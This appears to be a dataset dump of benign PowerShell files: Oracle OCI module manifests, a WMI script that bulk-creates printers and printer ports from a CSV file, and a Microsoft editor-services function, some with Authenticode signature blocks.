# VjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jcmwvTWlj
# cm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwGCCsGAQUF
# BwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3Br
# aW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgx
# KS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcDCDAOBgNV
# HQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBALmDVdTtuI0jAEt41O2OM8CU
# 237TGMyhrGr7FzKCEFaXxtoqk/IObQriq1caHVh2vyuQ24nz3TdOBv7rcs/qnPjO
# xnXFLyZPeaWLsNuARVmUViyVYXjXYB5DwzaWZgScY8GKL7yGjyWrh78WJUgh7rE1
# +5VD5h0/6rs9dBRqAzI9fhZz7spsjt8vnx50WExbBSSH7rfabHendpeqbTmW/Rfc
# aT+GFIsT+g2ej7wRKIq/QhnsoF8mpFNPHV1q/WK/rF/ChovkhJMDvlqtETWi97Go
# lOSKamZC9bYgcPKfz28ed25WJy10VtQ9P5+C/2dOfDaz1RmeOb27Kbegha0SfPcr
# iTfORVvqPDSa3n9N7dhTY7+49I8evoad9hdZ8CfIOPftwt3xTX2RhMZJCVoFlabH
# cvfb84raFM6cz5EYk+x1aVEiXtgK6R0xn1wjMXHf0AWlSjqRkzvSnRKzFsZwEl74
# VahlKVhI+Ci9RT9+6Gc0xWzJ7zQIUFE3Jiix5+7KL8ArHfBY9UFLz4snboJ7Qip3
# IADbkU4ZL0iQ8j8Ixra7aSYfToUefmct3dM69ff4Eeh2Kh9NsKiiph589Ap/xS1j
# ESlrfjL/g/ZboaS5d9a2fA598mubDvLD5x5PP37700vm/Y+PIhmp2fTvuS2sndeZ
# BmyTqcUNHRNmCk+njV3nMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJmQAAAAAA
# FTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
# bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
# b3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0
# aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1WjB8MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy
# b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEBBQADggIP
# ADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjKNVf2AX9s
# SuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhgfWpSg0S3
# po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJprx2rrPY2
# vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/dvI2k45GP
# sjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka97aSueik3
# rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKRHh09/SDP
# c31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9ituqBJR6L8F
# A6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyOArxCaC4Q
# 6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItboKaDIV1f
# MHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6bMURHXLv
# jflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6tAgMBAAGj
# ggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQWBBQqp1L+
# ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacbUzUZ6XIw
# XAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYzaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnkuaHRtMBMG
# A1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIAQwBBMAsG
# A1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2VsuP6KJc
# YmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwubWljcm9z
# b2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIz
# LmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93d3cubWlj
# cm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3J0
# MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/qXBS2Pk5H
# ZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6U03dmLq2
# HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVtI1TkeFN1
# JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis9/kpicO8
# F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTpkbKpW99J
# o3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0sHrYUP4K
# WN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138eW0QBjloZ
# kWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJsWkBRH58
# oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7Fx0ViY1w
# /ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0dFtq0Z4+
# 7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQtB1VM1iz
# oXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl
# cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjowODQyLTRC
# RTYtQzI5QTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZaIj
# CgEBMAcGBSsOAwIaAxUAQqIfIYljHUbNoY0/wjhXRn/sSA2ggYMwgYCkfjB8MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy
# b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIFAOm4EJsw
# IhgPMjAyNDA0MDQwMTMwMDNaGA8yMDI0MDQwNTAxMzAwM1owdDA6BgorBgEEAYRZ
# CgQBMSwwKjAKAgUA6bgQmwIBADAHAgEAAgIMdDAHAgEAAgIS4DAKAgUA6bliGwIB
# ADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAIDB6EgoQow
# CAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBABNDllQmK5Rsd8SGquLICLj68Cs6
# 2h7XlU8qwnvjDPQ5MImDr7EvIP+aFMzoz0wTfhmQzUjoNPHF2fBTzz88oXQrR5Vr
# p6Hnm92SX5VPx5HyVN6Dk0YmKdZQj2jEVVC7eybrIuf33cC/KUjeFvXu0vWMOezq
# aOPz/dtevddSF7GpMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg
# UENBIDIwMTACEzMAAAHajtXJWgDREbEAAQAAAdowDQYJYIZIAWUDBAIBBQCgggFK
# MBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQg16pJ
# 7JDGIqAkkppNBxr4JYGuM8UkUNOUB/nQ0O7FYgIwgfoGCyqGSIb3DQEJEAIvMYHq
# MIHnMIHkMIG9BCAipaNpYsDvnqTe95Dj1C09020I5ljibrW/ndICOxg9xjCBmDCB
# gKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
# EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV
# BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB2o7VyVoA0RGx
# AAEAAAHaMCIEIGp/ulqkxd6Rbm1Rk8DSHuOxdfz1TACbTOzbnshEjufRMA0GCSqG
# SIb3DQEBCwUABIICAEZHIdUJprfN/ix+9Wu4vyS9i59xBcrPf3HZE2tvJFhdcJd2
# xbO4LNBPLu2CzYA5eB+mOWIR5Pzm9gBdy8AGry+rEFgdbBolOLfiEGY8Jtw+2KW4
# SqJ7zn1cuK12u7RXQ+IojwrVf+E5S9xeGLORQ4/YJo+qFMrVDylLOqPni601mvsB
# El3biQXSDuI33eG8foijEDQuKlgrLr2vVvhQY+hS7n+4njcdm05LWJczZe0ZCADr
# dEarZGijxMHwZKgI2IJEOqoz6cWOJ4HCnm8uJZfEDyw9ahjDwUF8RFzTo5mCAx4i
# 7JoVTrYC6cwvI+GTmFIoqb23ilyzIg3XXr6VfBk1uM8ttspBlaMCBtg0qT3qzpTk
# o6Oi7yhTcDpW1DSMJPN5xqz9uiDq2lHJJ1inqNEMND89/D3Ozzto54geVOzyB67R
# 6eELA5rajgj72sOulbKni2ckhxAA5CZyEPGlnWP1nBeLHwubmJQ3Tx4aDAR5gg1/
# fElAtbdeEC+oXR+4tJ4bA62pTDLypg/aKxhh+1zUmjnJuCw1quuU23cG8yJAeUed
# 0gSzJtz29zm7dyGTHtHYSbJCuND/y1xk6C9iIKDCB00pfZcGrmIjOoBQcvNXO1w8
# 9XSCRKddEU6Kerx3oOfyWxlnPH/CNuVZwDvrVNnwdfm9P+dp9rDwNbVOyLHr
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_52_48.ps1
|
sample_52_48.ps1
|
#
# Module manifest for module 'OCI.PSModules.Recovery'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Recovery.dll'
# Version number of this module.
ModuleVersion = '81.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '953d757b-6410-4a6e-b5dc-2141a7da241e'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Recovery Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '81.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Recovery.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIRecoveryProtectedDatabase',
'Get-OCIRecoveryProtectedDatabasesList',
'Get-OCIRecoveryProtectionPoliciesList',
'Get-OCIRecoveryProtectionPolicy', 'Get-OCIRecoveryServiceSubnet',
'Get-OCIRecoveryServiceSubnetsList', 'Get-OCIRecoveryWorkRequest',
'Get-OCIRecoveryWorkRequestErrorsList',
'Get-OCIRecoveryWorkRequestLogsList',
'Get-OCIRecoveryWorkRequestsList',
'Invoke-OCIRecoveryFetchProtectedDatabaseConfiguration',
'Move-OCIRecoveryProtectedDatabaseCompartment',
'Move-OCIRecoveryProtectionPolicyCompartment',
'Move-OCIRecoveryServiceSubnetCompartment',
'New-OCIRecoveryProtectedDatabase',
'New-OCIRecoveryProtectionPolicy', 'New-OCIRecoveryServiceSubnet',
'Remove-OCIRecoveryProtectedDatabase',
'Remove-OCIRecoveryProtectionPolicy',
'Remove-OCIRecoveryServiceSubnet',
'Update-OCIRecoveryProtectedDatabase',
'Update-OCIRecoveryProtectionPolicy',
'Update-OCIRecoveryServiceSubnet'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Recovery'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/Create-Printers_3.ps1
|
Create-Printers_3.ps1
|
###########################################################################"
#
# NAME: Create-Printers.ps1
#
# AUTHOR: Jan Egil Ring
# EMAIL: jan.egil.ring@powershell.no
# BLOG: http://blog.powershell.no
#
# COMMENT: Simple script to bulk-create printers on a print-server. Printers are imported from a csv-file.
# Running the script from Windows Server 2003 returns an access denied error, possibly due to the impersonation-model in Windows Server 2003.
# Created and tested from Windows Server 2008 against a remote Windows Server 2003 print-server.
# Should work from Windows Vista, Windows 7, Windows Server 2008 and Windows Server 2008 R2 against remote print-servers (2000/2003/2008/2008 R2)
#
# You have a royalty-free right to use, modify, reproduce, and
# distribute this script file in any way you find useful, provided that
# you agree that the creator, owner above has no warranty, obligations,
# or liability for such use.
#
# VERSION HISTORY:
# 1.0 07.11.2009 - Initial release
#
###########################################################################"
function CreatePrinter {
$server = $args[0]
$print = ([WMICLASS]"\\\\$server\\ROOT\\cimv2:Win32_Printer").createInstance()
$print.drivername = $args[1]
$print.PortName = $args[2]
$print.Shared = $true
$print.Sharename = $args[3]
$print.Location = $args[4]
$print.Comment = $args[5]
$print.DeviceID = $args[6]
$print.Put()
}
function CreatePrinterPort {
$server = $args[0]
$port = ([WMICLASS]"\\\\$server\\ROOT\\cimv2:Win32_TCPIPPrinterPort").createInstance()
$port.Name= $args[1]
$port.SNMPEnabled=$false
$port.Protocol=1
$port.HostAddress= $args[2]
$port.Put()
}
$printers = Import-Csv c:\\printers.csv
foreach ($printer in $printers) {
CreatePrinterPort $printer.Printserver $printer.Portname $printer.IPAddress
CreatePrinter $printer.Printserver $printer.Driver $printer.Portname $printer.Sharename $printer.Location $printer.Comment $printer.Printername
}
|
combined_dataset/train/non-malicious/sample_45_31.ps1
|
sample_45_31.ps1
|
#
# Module manifest for module 'OCI.PSModules.Ons'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Ons.dll'
# Version number of this module.
ModuleVersion = '75.1.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '5db527a1-caef-435a-b9e8-81f76e294a8a'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Ons Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '75.1.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Ons.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIOnsConfirmSubscription', 'Get-OCIOnsSubscription',
'Get-OCIOnsSubscriptionsList', 'Get-OCIOnsTopic',
'Get-OCIOnsTopicsList', 'Get-OCIOnsUnsubscription',
'Invoke-OCIOnsPublishMessage',
'Invoke-OCIOnsResendSubscriptionConfirmation',
'Move-OCIOnsSubscriptionCompartment', 'Move-OCIOnsTopicCompartment',
'New-OCIOnsSubscription', 'New-OCIOnsTopic',
'Remove-OCIOnsSubscription', 'Remove-OCIOnsTopic',
'Update-OCIOnsSubscription', 'Update-OCIOnsTopic'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Ons'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_52_67.ps1
|
sample_52_67.ps1
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
function Join-ScriptExtent {
<#
.EXTERNALHELP ..\PowerShellEditorServices.Commands-help.xml
#>
[CmdletBinding()]
[OutputType([System.Management.Automation.Language.IScriptExtent])]
param(
[Parameter(ValueFromPipeline, ValueFromPipelineByPropertyName)]
[System.Management.Automation.Language.IScriptExtent[]]
$Extent
)
begin {
$extentList = New-Object System.Collections.Generic.List[System.Management.Automation.Language.IScriptExtent]
}
process {
if ($Extent) {
$extentList.AddRange($Extent)
}
}
end {
if (-not $extentList) { return }
$startOffset = [Linq.Enumerable]::Min($extentList.StartOffset -as [int[]])
$endOffset = [Linq.Enumerable]::Max($extentList.EndOffset -as [int[]])
return New-Object Microsoft.PowerShell.EditorServices.FullScriptExtent @(
$psEditor.GetEditorContext().CurrentFile,
$startOffset,
$endOffset)
}
}
# SIG # Begin signature block
# MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAm3JWk8zKQA39G
# Edxe+fQfm3exNMgvkOzz7dNsgZam4KCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
